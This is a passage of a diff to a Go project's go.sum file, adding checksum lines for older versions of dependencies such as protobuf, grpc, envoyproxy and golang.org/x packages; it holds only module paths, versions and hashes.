h1:sBEjpZlNHzK1voKq9695PJSX2o5NEXl7/OL3coiIY0c= github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0/go.mod h1:P4WPRUkOhJC13W//jWpyfJNDAIpvRbAUIYLX/4jtlE0= github.com/GoogleCloudPlatform/opentelemetry-operations-go/exporter/metric v0.54.0 h1:lhhYARPUu3LmHysQ/igznQphfzynnqI3D75oUyw1HXk= @@ -240,6 +258,7 @@ github.com/bishopfox/awsservicemap v1.1.0 h1:MM+rmGsXjkBtFR1IlS+GpVKR2srGr+V4l/J github.com/bishopfox/awsservicemap v1.1.0/go.mod h1:oy9Fyqh6AozQjShSx+zRNouTlp7k3z3YEMoFkN8rquc= github.com/bishopfox/knownawsaccountslookup 
v0.0.0-20231228165844-c37ef8df33cb h1:ot96tC/kdm0GKV1kl+aXJorqJbyx92R9bjRQvbBmLKU= github.com/bishopfox/knownawsaccountslookup v0.0.0-20231228165844-c37ef8df33cb/go.mod h1:2OnSqu4B86+2xGSIE5D4z3Rze9yJ/LNNjNXHhwMR+vY= +github.com/census-instrumentation/opencensus-proto v0.2.1/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU= github.com/cespare/xxhash/v2 v2.3.0 h1:UL815xU9SqsFlibzuggzjXhog7bL6oX9BbNZnL2UFvs= github.com/cespare/xxhash/v2 v2.3.0/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs= github.com/charmbracelet/bubbles v0.21.0 h1:9TdC97SdRVg/1aaXNVWfFH3nnLAwOXr8Fn6u6mfQdFs= @@ -258,12 +277,14 @@ github.com/charmbracelet/x/exp/golden v0.0.0-20241011142426-46044092ad91 h1:payR github.com/charmbracelet/x/exp/golden v0.0.0-20241011142426-46044092ad91/go.mod h1:wDlXFlCrmJ8J+swcL/MnGUuYnqgQdW9rhSD61oNMb6U= github.com/charmbracelet/x/term v0.2.2 h1:xVRT/S2ZcKdhhOuSP4t5cLi5o+JxklsoEObBSgfgZRk= github.com/charmbracelet/x/term v0.2.2/go.mod h1:kF8CY5RddLWrsgVwpw4kAa6TESp6EB5y3uxGLeCqzAI= +github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw= github.com/clipperhouse/displaywidth v0.6.1 h1:/zMlAezfDzT2xy6acHBzwIfyu2ic0hgkT83UX5EY2gY= github.com/clipperhouse/displaywidth v0.6.1/go.mod h1:R+kHuzaYWFkTm7xoMmK1lFydbci4X2CicfbGstSGg0o= github.com/clipperhouse/stringish v0.1.1 h1:+NSqMOr3GR6k1FdRhhnXrLfztGzuG+VuFDfatpWHKCs= github.com/clipperhouse/stringish v0.1.1/go.mod h1:v/WhFtE1q0ovMta2+m+UbpZ+2/HEXNWYXQgCt4hdOzA= github.com/clipperhouse/uax29/v2 v2.3.0 h1:SNdx9DVUqMoBuBoW3iLOj4FQv3dN5mDtuqwuhIGpJy4= github.com/clipperhouse/uax29/v2 v2.3.0/go.mod h1:Wn1g7MK6OoeDT0vL+Q0SQLDz/KpfsVRgg6W7ihQeh4g= +github.com/cncf/udpa/go v0.0.0-20191209042840-269d4d468f6f/go.mod h1:M8M6+tZqaGXZJjfX53e64911xZQV5JYwmTeXPW+k8Sc= github.com/cncf/xds/go v0.0.0-20251210132809-ee656c7534f5 h1:6xNmx7iTtyBRev0+D/Tv1FZd4SCg8axKApyNyRsAt/w= github.com/cncf/xds/go v0.0.0-20251210132809-ee656c7534f5/go.mod h1:KdCmV+x/BuvyMxRnYBlmVaq4OLiKW6iRQfvC62cvdkI= 
github.com/cpuguy83/go-md2man/v2 v2.0.6/go.mod h1:oOW0eioCTA6cOiMLiUPZOpcVxMig6NIQQ7OS05n1F4g= @@ -275,12 +296,16 @@ github.com/dimchansky/utfbom v1.1.1 h1:vV6w1AhK4VMnhBno/TPVCoK9U/LP0PkLCS9tbxHdi github.com/dimchansky/utfbom v1.1.1/go.mod h1:SxdoEBH5qIqFocHMyGOXVAybYJdr71b1Q/j0mACtrfE= github.com/dominikbraun/graph v0.23.0 h1:TdZB4pPqCLFxYhdyMFb1TBdFxp8XLcJfTTBQucVPgCo= github.com/dominikbraun/graph v0.23.0/go.mod h1:yOjYyogZLY1LSG9E33JWZJiq5k83Qy2C6POAuiViluc= +github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= +github.com/envoyproxy/go-control-plane v0.9.1-0.20191026205805-5f8ba28d4473/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= +github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1mIlRU8Am5FuJP05cCM98= github.com/envoyproxy/go-control-plane v0.13.5-0.20251024222203-75eaa193e329 h1:K+fnvUM0VZ7ZFJf0n4L/BRlnsb9pL/GuDG6FqaH+PwM= github.com/envoyproxy/go-control-plane v0.13.5-0.20251024222203-75eaa193e329/go.mod h1:Alz8LEClvR7xKsrq3qzoc4N0guvVNSS8KmSChGYr9hs= github.com/envoyproxy/go-control-plane/envoy v1.36.0 h1:yg/JjO5E7ubRyKX3m07GF3reDNEnfOboJ0QySbH736g= github.com/envoyproxy/go-control-plane/envoy v1.36.0/go.mod h1:ty89S1YCCVruQAm9OtKeEkQLTb+Lkz0k8v9W0Oxsv98= github.com/envoyproxy/go-control-plane/ratelimit v0.1.0 h1:/G9QYbddjL25KvtKTv3an9lx6VBE2cnb8wp1vEGNYGI= github.com/envoyproxy/go-control-plane/ratelimit v0.1.0/go.mod h1:Wk+tMFAFbCXaJPzVVHnPgRKdUdwW/KdbRt94AzgRee4= +github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= github.com/envoyproxy/protoc-gen-validate v1.3.0 h1:TvGH1wof4H33rezVKWSpqKz5NXWg5VPuZ0uONDT6eb4= github.com/envoyproxy/protoc-gen-validate v1.3.0/go.mod h1:HvYl7zwPa5mffgyeTUHA9zHIH36nmrm7oCbo4YKoSWA= github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f h1:Y/CXytFA4m6baUTXGLOoWe4PQhGxaX0KpnayAqC48p4= @@ -313,16 +338,37 @@ github.com/golang-jwt/jwt/v4 v4.5.2 
h1:YtQM7lnr8iZ+j5q71MGKkNw9Mn7AjHM68uc9g5fXe github.com/golang-jwt/jwt/v4 v4.5.2/go.mod h1:m21LjoU+eqJr34lmDMbreY2eSTRJ1cv77w39/MY0Ch0= github.com/golang-jwt/jwt/v5 v5.3.0 h1:pv4AsKCKKZuqlgs5sUmn4x8UlGa0kEVt/puTpKx9vvo= github.com/golang-jwt/jwt/v5 v5.3.0/go.mod h1:fxCRLWMO43lRc8nhHWY6LGqRcf+1gQWArsqaEUEa5bE= +github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q= +github.com/golang/groupcache v0.0.0-20200121045136-8c9f03a8e57e/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= +github.com/golang/groupcache v0.0.0-20210331224755-41bb18bfe9da h1:oI5xCqsCo564l8iNU+DwB5epxmsaqB+rhGL0m5jtYqE= +github.com/golang/groupcache v0.0.0-20210331224755-41bb18bfe9da/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= +github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= +github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= +github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= +github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8= +github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA= +github.com/golang/protobuf v1.4.0-rc.2/go.mod h1:LlEzMj4AhA7rCAGe4KMBDvJI+AwstrUpVNzEA03Pprs= +github.com/golang/protobuf v1.4.0-rc.4.0.20200313231945-b860323f09d0/go.mod h1:WU3c8KckQ9AFe+yFwt9sWVRKCVIyN9cPHBJSNnbL67w= +github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvqG2KuDX0= +github.com/golang/protobuf v1.4.1/go.mod h1:U8fpvMrcmy5pZrNK1lt4xCsGvpyWQ/VVv6QDs8UjoX8= +github.com/golang/protobuf v1.4.3/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= github.com/golang/protobuf v1.5.4 h1:i7eJL8qZTpSEXOPTxNKhASYpMn+8e5Q6AdndVa1dWek= github.com/golang/protobuf v1.5.4/go.mod h1:lnTiLA8Wa4RWRcIUkrtSVa5nRhsEGBg48fD6rSs7xps= github.com/google/flatbuffers v25.9.23+incompatible 
h1:rGZKv+wOb6QPzIdkM2KxhBZCDrA0DeN6DNmRDrqIsQU= github.com/google/flatbuffers v25.9.23+incompatible/go.mod h1:1AeVuKshWv4vARoZatz6mlQ0JxURH0Kv5+zNeJKJCa8= +github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M= +github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= +github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= +github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.3/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.7.0 h1:wk8382ETsv4JYUZwIsn6YpYiWiBsYLSJiTsyBybVuN8= github.com/google/go-cmp v0.7.0/go.mod h1:pXiqmnSA92OHEEa9HXL2W4E7lf9JzCmGVUdgjX3N/iU= github.com/google/martian/v3 v3.3.3 h1:DIhPTQrbPkgs2yJYdXU/eNACCG5DVQjySNRNlflZ9Fc= github.com/google/martian/v3 v3.3.3/go.mod h1:iEPrYcgCF7jA9OtScMFQyAlZZ4YXTKEtJ1E6RWzmBA0= github.com/google/s2a-go v0.1.9 h1:LGD7gtMgezd8a/Xak7mEWL0PjoTQFvpRudN895yqKW0= github.com/google/s2a-go v0.1.9/go.mod h1:YA0Ei2ZQL3acow2O62kdp9UlnvMmU7kA6Eutn0dXayM= +github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0= github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/enterprise-certificate-proxy v0.3.7 h1:zrn2Ee/nWmHulBx5sAVrGgAa0f2/R35S4DJwfFaUPFQ= @@ -380,6 +426,7 @@ github.com/planetscale/vtprotobuf v0.6.1-0.20240319094008-0393e58bdf10/go.mod h1 github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2 h1:Jamvg5psRIccs7FGNTlIRMkT8wgtp5eCXdBlqhYGL6U= github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= 
+github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= github.com/rivo/uniseg v0.4.7 h1:WUdvkW8uEhrYfLC4ZzdpI2ztxP1I582+49Oc5Mq64VQ= github.com/rivo/uniseg v0.4.7/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88= github.com/rogpeppe/go-internal v1.14.1 h1:UQB4HGPB6osV0SQTLymcB4TgvyWu6ZyliaW0tI/otEQ= @@ -403,6 +450,7 @@ github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UV github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= github.com/stretchr/testify v1.8.0/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU= +github.com/stretchr/testify v1.8.1/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= github.com/stretchr/testify v1.8.2/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= github.com/stretchr/testify v1.11.1 h1:7s2iGBzp5EwR7/aIZr8ao5+dra3wiQyKjjFuvgVKu7U= github.com/stretchr/testify v1.11.1/go.mod h1:wZwfW3scLgRK+23gO65QZefKpKQRnfz6sD981Nm4B6U= @@ -413,8 +461,12 @@ github.com/zeebo/assert v1.3.0 h1:g7C04CbJuIDKNPFHmsk4hwZDO5O+kntRxzaUoNXj+IQ= github.com/zeebo/assert v1.3.0/go.mod h1:Pq9JiuJQpG8JLJdtkwrJESF0Foym2/D9XMU5ciN/wJ0= github.com/zeebo/xxh3 v1.0.2 h1:xZmwmqxHZA8AI603jOQ0tMqmBr9lPeFwGg6d+xy9DC0= github.com/zeebo/xxh3 v1.0.2/go.mod h1:5NWz9Sef7zIDm2JHfFlcQvNekmcEl9ekUZQQKCYaDcA= +go.einride.tech/aip v0.73.0 h1:bPo4oqBo2ZQeBKo4ZzLb1kxYXTY1ysJhpvQyfuGzvps= +go.einride.tech/aip v0.73.0/go.mod h1:Mj7rFbmXEgw0dq1dqJ7JGMvYCZZVxmGOR3S4ZcV5LvQ= go.mongodb.org/mongo-driver v1.17.6 h1:87JUG1wZfWsr6rIz3ZmpH90rL5tea7O3IHuSwHUpsss= go.mongodb.org/mongo-driver v1.17.6/go.mod h1:Hy04i7O2kC4RS06ZrhPRqj/u4DTYkFDAAccj+rVKqgQ= +go.opencensus.io v0.24.0 h1:y73uSU6J157QMP2kn2r30vwW1A2W2WFwSCGnAVxeaD0= +go.opencensus.io v0.24.0/go.mod h1:vNK8G9p7aAivkbmorf4v+7Hgx+Zs0yY+0fOtgBfjQKo= go.opentelemetry.io/auto/sdk v1.2.1 
h1:jXsnJ4Lmnqd11kwkBV2LgLoFMZKizbCi5fNZ/ipaZ64= go.opentelemetry.io/auto/sdk v1.2.1/go.mod h1:KRTj+aOaElaLi+wW1kO/DZRXwkF4C5xPbEe3ZiIhN7Y= go.opentelemetry.io/contrib/detectors/gcp v1.39.0 h1:kWRNZMsfBHZ+uHjiH4y7Etn2FK26LAGkNFw7RHv1DhE= @@ -437,18 +489,29 @@ go.opentelemetry.io/otel/trace v1.39.0 h1:2d2vfpEDmCJ5zVYz7ijaJdOF59xLomrvj7bjt6 go.opentelemetry.io/otel/trace v1.39.0/go.mod h1:88w4/PnZSazkGzz/w84VHpQafiU4EtqqlVdxWy+rNOA= go.yaml.in/yaml/v3 v3.0.4/go.mod h1:DhzuOOF2ATzADvBadXxruRBLzYTpT36CKvDb3+aBEFg= golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= +golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/crypto v0.0.0-20220722155217-630584e8d5aa/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4= golang.org/x/crypto v0.17.0/go.mod h1:gCAAfMLgwOJRpTjQ2zCCt2OcSfYMTeZVSRtQlPC7Nq4= golang.org/x/crypto v0.46.0 h1:cKRW/pmt1pKAfetfu+RCEvjvZkA9RimPbh7bhFjGVBU= golang.org/x/crypto v0.46.0/go.mod h1:Evb/oLKmMraqjZ2iQTwDwvCtJkczlDuTmdJXoZVzqU0= +golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/exp v0.0.0-20251209150349-8475f28825e9 h1:MDfG8Cvcqlt9XXrmEiD4epKn7VJHZO84hejP9Jmp0MM= golang.org/x/exp v0.0.0-20251209150349-8475f28825e9/go.mod h1:EPRbTFwzwjXj9NpYyyrvenVh9Y+GFeEvMNh7Xuz7xgU= +golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE= +golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU= +golang.org/x/lint v0.0.0-20190313153728-d0100b6bd8b3/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4= golang.org/x/mod v0.8.0/go.mod 
h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs= golang.org/x/mod v0.31.0 h1:HaW9xtz0+kOcWKwli0ZXy79Ix+UW/vOfmWI5QVd2tgI= golang.org/x/mod v0.31.0/go.mod h1:43JraMp9cGx1Rx3AqioxrbrhNsLl2l/iNAvuBkrezpg= +golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= +golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20201110031124-69a78807bb2b/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c= @@ -456,14 +519,20 @@ golang.org/x/net v0.6.0/go.mod h1:2Tu9+aMcznHK/AK1HMvgo6xiTLG5rD5rZLDS+rp2Bjs= golang.org/x/net v0.10.0/go.mod h1:0qNGK6F8kojg2nk9dLZ2mShWaEBan6FAoqfSigmmuDg= golang.org/x/net v0.48.0 h1:zyQRTTrjc33Lhh0fBgT/H3oZq9WuvRR5gPC70xpDiQU= golang.org/x/net v0.48.0/go.mod h1:+ndRgGjkh8FGtu1w1FGbEC31if4VrNVMuKTgcAAnQRY= +golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= golang.org/x/oauth2 v0.34.0 h1:hqK/t4AKgbqWkdkcAeI8XLmbK+4m4G5YeQRrmiotGlw= golang.org/x/oauth2 v0.34.0/go.mod h1:lzm5WQJQwKZ3nwavOZ3IS5Aulzxi68dUSgRHujetwEA= +golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= 
+golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.1.0/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.19.0 h1:vV+1eWNmZ5geRlYjzm2adRgW2/mcpevXNg50YZtPCE4= golang.org/x/sync v0.19.0/go.mod h1:9KTHXmSnoGruLpwFjVSX0lNNA75CykiMECbovNTZqGI= +golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= @@ -499,26 +568,50 @@ golang.org/x/text v0.32.0/go.mod h1:o/rUWzghvpD5TXrTIBuJU77MTaN0ljMWE47kxGJQ7jY= golang.org/x/time v0.14.0 h1:MRx4UaLrDotUKUdCIqzPC48t1Y9hANFKIRpNx+Te8PI= golang.org/x/time v0.14.0/go.mod h1:eL/Oa2bBBK0TkX57Fyni+NgnyQQN4LitPmob2Hjnqw4= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= +golang.org/x/tools v0.0.0-20190114222345-bf090417da8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= +golang.org/x/tools v0.0.0-20190226205152-f727befe758c/go.mod h1:9Yl7xja0Znq3iFh3HoIrodX9oNMXvdceNzlUR8zjMvY= +golang.org/x/tools v0.0.0-20190311212946-11955173bddd/go.mod 
h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs= +golang.org/x/tools v0.0.0-20190524140312-2c0ae7006135/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q= golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc= golang.org/x/tools v0.6.0/go.mod h1:Xwgl3UAJ/d3gWutnCtw505GrjyAbvKui8lOU390QaIU= golang.org/x/tools v0.40.0 h1:yLkxfA+Qnul4cs9QA3KnlFu0lVmd8JJfoq+E41uSutA= golang.org/x/tools v0.40.0/go.mod h1:Ik/tzLRlbscWpqqMRjyWYDisX8bG13FrdXp3o4Sr9lc= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= +golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da h1:noIWHXmPHxILtqtCOPIhSt0ABwskkZKjD3bXGnZGpNY= golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da/go.mod h1:NDW/Ps6MPRej6fsCIbMTohpP40sJ/P/vI1MoTEGwX90= gonum.org/v1/gonum v0.16.0 h1:5+ul4Swaf3ESvrOnidPp4GZbzf0mxVQpDCYUQE7OJfk= gonum.org/v1/gonum v0.16.0/go.mod h1:fef3am4MQ93R2HHpKnLk4/Tbh/s0+wqD5nfa6Pnwy4E= google.golang.org/api v0.257.0 h1:8Y0lzvHlZps53PEaw+G29SsQIkuKrumGWs9puiexNAA= google.golang.org/api v0.257.0/go.mod h1:4eJrr+vbVaZSqs7vovFd1Jb/A6ml6iw2e6FBYf3GAO4= +google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM= +google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= +google.golang.org/genproto v0.0.0-20180817151627-c66870c02cf8/go.mod h1:JiN7NxoALGmiZfu7CAH4rXhgtRTLTxftemlI0sWmxmc= +google.golang.org/genproto v0.0.0-20190819201941-24fa4b261c55/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc= +google.golang.org/genproto v0.0.0-20200526211855-cb27e3aa2013/go.mod h1:NbSheEEYHJ7i3ixzK3sjbqSGDJWnxyFXZblF3eUsNvo= google.golang.org/genproto v0.0.0-20251202230838-ff82c1b0f217 h1:GvESR9BIyHUahIb0NcTum6itIWtdoglGX+rnGxm2934= 
google.golang.org/genproto v0.0.0-20251202230838-ff82c1b0f217/go.mod h1:yJ2HH4EHEDTd3JiLmhds6NkJ17ITVYOdV3m3VKOnws0= google.golang.org/genproto/googleapis/api v0.0.0-20251202230838-ff82c1b0f217 h1:fCvbg86sFXwdrl5LgVcTEvNC+2txB5mgROGmRL5mrls= google.golang.org/genproto/googleapis/api v0.0.0-20251202230838-ff82c1b0f217/go.mod h1:+rXWjjaukWZun3mLfjmVnQi18E1AsFbDN9QdJ5YXLto= google.golang.org/genproto/googleapis/rpc v0.0.0-20251202230838-ff82c1b0f217 h1:gRkg/vSppuSQoDjxyiGfN4Upv/h/DQmIR10ZU8dh4Ww= google.golang.org/genproto/googleapis/rpc v0.0.0-20251202230838-ff82c1b0f217/go.mod h1:7i2o+ce6H/6BluujYR+kqX3GKH+dChPTQU19wjRPiGk= +google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= +google.golang.org/grpc v1.23.0/go.mod h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg= +google.golang.org/grpc v1.25.1/go.mod h1:c3i+UQWmh7LiEpx4sFZnkU36qjEYZ0imhYfXVyQciAY= +google.golang.org/grpc v1.27.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= +google.golang.org/grpc v1.33.2/go.mod h1:JMHMWHQWaTccqQQlmk3MJZS+GWXOdAesneDmEnv2fbc= google.golang.org/grpc v1.77.0 h1:wVVY6/8cGA6vvffn+wWK5ToddbgdU3d8MNENr4evgXM= google.golang.org/grpc v1.77.0/go.mod h1:z0BY1iVj0q8E1uSQCjL9cppRj+gnZjzDnzV0dHhrNig= +google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8= +google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0= +google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM= +google.golang.org/protobuf v1.20.1-0.20200309200217-e05f789c0967/go.mod 